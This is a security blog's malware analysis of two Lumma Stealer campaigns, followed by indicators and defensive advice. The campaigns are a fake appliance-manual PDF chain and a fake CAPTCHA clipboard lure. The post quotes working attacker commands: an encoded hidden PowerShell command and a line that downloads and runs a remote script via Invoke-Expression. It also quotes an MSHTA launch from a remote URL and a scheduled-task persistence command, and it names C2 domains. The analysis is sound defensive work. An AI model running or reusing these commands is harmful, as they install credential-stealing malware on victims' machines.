Converging paths - Analysis of recent Lumma Stealer campaigns

As part of our 2024 Cyber Smart Week blog series, our security team share their thoughts and analysis of some recent Lumma Stealer campaigns... 

Dozens of paths can all lead to one place, and on this journey that’s to Lumma Stealer.

What is Lumma?

Lumma Stealer, or formerly LummaC2, is an information stealer that has been advertised and sold as a Malware-as-a-Service offering on several cybercrime forums since 2022. The malware receives frequent updates and has extensive capabilities, including:

• EDR and AV evasion capabilities:
  • Direct syscalls (relevant reading from MDSec and Outflank).
  • Heavens Gate, permitting execution of 64-bit code in 32-bit processes.
• Chromium and Mozilla browser password, cookie and history theft.
• Cryptocurrency and MFA browser extension support.
• Discord application token theft.
• Low-level file grabber.
• Integrated reverse proxy (using GhostSocks).
• EXE, DLL, PS1, and LNK payload builders.

Source: LummaC2 Gitbook

The seller, “Shamel”, is also responsible for 7.62mm Stealer:

Lumma subscriptions begin at $250/month and extend to $1000/month. There is also an option to make a one-time $20,000 payment to obtain the stealer and panel source code, and the right to resell it:

From 2023 onwards, Lumma has made steady progress towards becoming the dominant player in the information stealer market. As seen on the log and credit card marketplace “Russian Market”, Lumma is currently the top source of logs by a significant margin:

The potential impact of stealer infections is not limited to the compromise of email accounts and web services. Credential sets purchased from markets like this often include logins that threat actors can use to gain initial access to organisations through their corporate VPN.

Samples

Both of the following samples were discovered in-the-wild on Tuesday 22^nd October, but are associated with campaigns that have been active for multiple months.

PDF leading to Lumma and Amadey

This chain begins with an innocuous looking Google search result for a site (instructionhub[.]net) offering documentation for household appliances. Reports from both a customer, and peers at other MDR providers, indicate that victims stumbled across this when trying to find manuals for power tools:

The link lands the user directly in a PDF document, which on the first page offers a link to view the otherwise blurred manual:

This redirects to a WebDAV (Web Distributed and Versioning) server redirect at all-instructions[.]wsconnect[.]org:

Allowing it to open presents a shortcut file hosted at hXXp://download[.]wsconnect[.]org/Downloads/Instruction_1928_W9COI.pdf.lnk, which tries to conceal itself as a PDF file:

Default Windows security settings will present the user with a warning that the file is remote, and request confirmation to open it:

The shortcut does not point to a specific file and instead initiates the infection chain, beginning with retrieving and executing an Emmenhtal payload from a remote URL using MSHTA:

C:\Windows\System32\forfiles.exe /p C:\Windows /m exp*.exe /c "powershell Start-Process \*i*\*2\msh*e hXXps://pdb[.]timeless-tales[.]shop/api/reg/HardhatSeminar.json"

The Emmenhtal HTA script is contained within a legitimate Notepad executable:

As seen here, the obfuscated JavaScript found in the same file:

This decodes to obfuscated PowerShell, which is run by MSHTA using WScript.Shell:

The hex string is decrypted, and the resulting code run with Invoke-Expression ($ZwCPJpLIY.Substring(0,3) being “iex”):

This next blob is simply base64 encoded. The effective script downloads an AutoIT loader (update.bin) and script (config.bin), and starts the loader with the script as it's single argument:

The decompiled AutoIT script uses a homebrew encryption function to obfuscate itself, but it is essentially a shellcode loader:

Once decrypted, it was found to take the first 172892 bytes of the file (which share strings with confirmed DarkGate samples), decrypt them, initialise a struct of the same size, and execute the struct contents via an EnumWindows callback:

OpenWith.exe is then spawned and Lumma injected into it:

Exfil is made to a path under c1[.]creative-habitat[.]shop:

2 additional files are also retrieved by the OpenWith.exe process:

• An unknown loader (matched some ModiLoader signature), used to deliver Amadey. While signed, the signature is invalid.
• Another unknown loader (ldr_clp), used to retrieve an archive (clp.bin) containing an AutoIT loader and script.

The AutoIT script is very similar to the one seen earlier in the chain, used to extract shellcode from the file and execute it through a callback function:

The other loader spawns a new process tree using a well-documented UAC bypass (via the ICMLuaUtil COM interface):

Another more.com process is started, which in turn creates a new explorer process – into which an Amadey payload is loaded:

Amadey begins C2 with hXXp://em3r30[.]updateexpert[.]shop/pLQvfD4d5/index.php:

Copy+Paste PowerShell leading to Lumma

The second example begins with a user being directed to a page that requests they complete a CAPTCHA, or take action to resolve a browser issue (as seen in this ProofPoint blog). There are multiple variants of this that exist, and the form may be embedded within a page:

A message box informs them to launch the Windows run box, paste the contents of their clipboard and press Enter:

A Javascript function has been used to copy an encoded PowerShell command to their clipboard, with an additional parameter that hides the PowerShell window:

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAGkAcABsAG8AZwBnAGUAcgAuAHIAdQAvADIANQAwADkAMgA1ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAA=

A PowerShell window is very briefly flashed up, and the infection process begins.

While first observed in the wild, this technique has been more recently refined by security researchers, and a slick demonstration of it open-sourced on GitHub:

Source: X/Twitter

The PowerShell command pulls an additional script from iplogger[.]ru and runs it using Invoke-Expression:

iex (iwr hXXps://iplogger[.]ru/250925 -UseBasicParsing).Content

This downloads a ZIP file, extracts it into the path %TEMP%\file\, and then launches “Set-up.exe” from within that folder:

“Set-up.exe” is a legitimate Thunderbird installer:

All DLL’s bundled in the ZIP are signed as expected, with exception for xpcom_core.dll. This matches the same findings that ZScaler made of HijackLoader:

Like the first sample, the sideloaded Thunderbird installer spawns more.com which drops a large, randomly named file in %TEMP% and injects Lumma into a new SearchIndexer.exe process:

Exfil is made to a path under platformcati[.]sbs:

A further PowerShell script is pulled from onefreex[.]com:

This saves an executable in %TEMP% and launches it. Two oversized files are dropped in the same path:

• “service123.exe”: DLL loader.
• “vErfIqrtTJHPODUCAmMF.dll: Clipbanker payload.

“service123.exe” is launched and configures a scheduled task named “ServiceData4” which attempts to start this executable every minute. Mutex “QzlqMofVpuyLobHvTcyZ” is used to prevent duplicate instances of the malware from running simultaneously:

"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f

Artifacts

Indicators of Compromise

Samples

• Sample 1: https://app.any.run/tasks/ee011753-dace-4038-8d5e-0d73067b5217
• Sample 2: https://app.any.run/tasks/66e0d180-7429-4482-b7cd-64d7a9546728

Response

• Retire legacy antivirus solutions in favour of modern XDR options such as Defender for Endpoint, CrowdStrike or SentinelOne.
• Ensure your XDR platform is configured according to vendor recommended best practices. This will include:
  • Enabling anti-tamper functionality.
  • Avoiding exclusions wherever possible and defining exclusions as specifically possible where a conflict between software and the security platform is identified. Never define broad exclusions, including those that apply to entire drives or profiles, file-types or system applications that could be abused as a LOLBIN.
  • Do not immediately dismiss alerts for system applications as expected behaviour. This is especially common to observe in security programs operated by internal IT resources. Those responsible for detection and response functions must be well-versed in current adversary tradecraft.
• Use a reputable password manager (e.g., 1Password) and avoid saving passwords in browsers.
• There is no single best resource for emerging malware. While a lot is kept within cybersecurity trust groups, X/Twitter can still be a great resource using a list like this one that I maintain.